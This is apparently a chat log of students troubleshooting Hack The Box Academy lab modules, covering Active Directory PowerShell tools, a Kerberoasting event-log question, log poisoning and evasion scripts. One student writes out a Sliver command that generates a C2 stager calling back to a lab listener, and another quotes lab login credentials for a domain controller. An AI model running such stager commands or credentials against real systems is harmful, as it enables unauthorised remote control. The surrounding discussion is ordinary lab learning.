it throws an access denied exception. This makes sense as neither accounts available to the student (htb-student and mtanaka) have admin privileges. I've tried a few privilege escalation techniques which haven't worked although this is well outside the scope of this module. Does anyone happen to know a workaround for this issue? Would like to practice the rest of the section (already answered all the questions).

fathom pendant
shrewd sand
fathom pendant
#

you should be able to just Import-Module ActiveDirectory

shrewd sand
#

I actually did already do that but it tells me this is a separate thing to grab the Remote System Administration Tools

fathom pendant
#

it likely is already installed on the target

shrewd sand
#

Oh, alright. I'll keep trying on the target then.

fathom pendant
#

if you can do the other Get-ADuser and such commands, then it's installed

shrewd sand
#

Yep, MTanaka can use Get-ADUser; I assumed RSAT was something entirely different from ActiveDirectory. My bad.

half ice
#

hello guys
i need some help with the module windows defense & attack
i do it my best but i didnt find servicesid After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?

slim locust
#

without giving too much away RDP from somewhere else then where you RDPd before

ancient yacht
#

Got the Flag for the last question on File inclusion for log poisoning but the flag is wrong? NM tried it again and it works. If someone fixed it thank you!

ancient yacht
#

try resetting the target and start again.

#

What is your question?

round marten
#

How did you go with this? I'm having the same problem with Evasion module SA2 - script that work when I run them just getting a timeout when I try and let the module run them.

foggy monolith
#

Intro to C2 Ops with Sliver § Probing the Surface

I'm getting the following error when I attempt to generate a stager using my actual VPN IP address (and note that I also had to downgrade Sliver to work around the issue that @shut wraith was facing on October 12):

sliver > generate stager --lhost 10.10.16.52 --lport 4444 --format csharp --save staged.txt

[!] Error resolving 10.10.16.52: lookup 10.10.16.52: no such host

sliver > 

Why won't Sliver acknowledge the existence of this IP address despite an active VPN connection, and is there any way to suppress Sliver's DNS checks?

shut wraith
#

Please install using the kali repo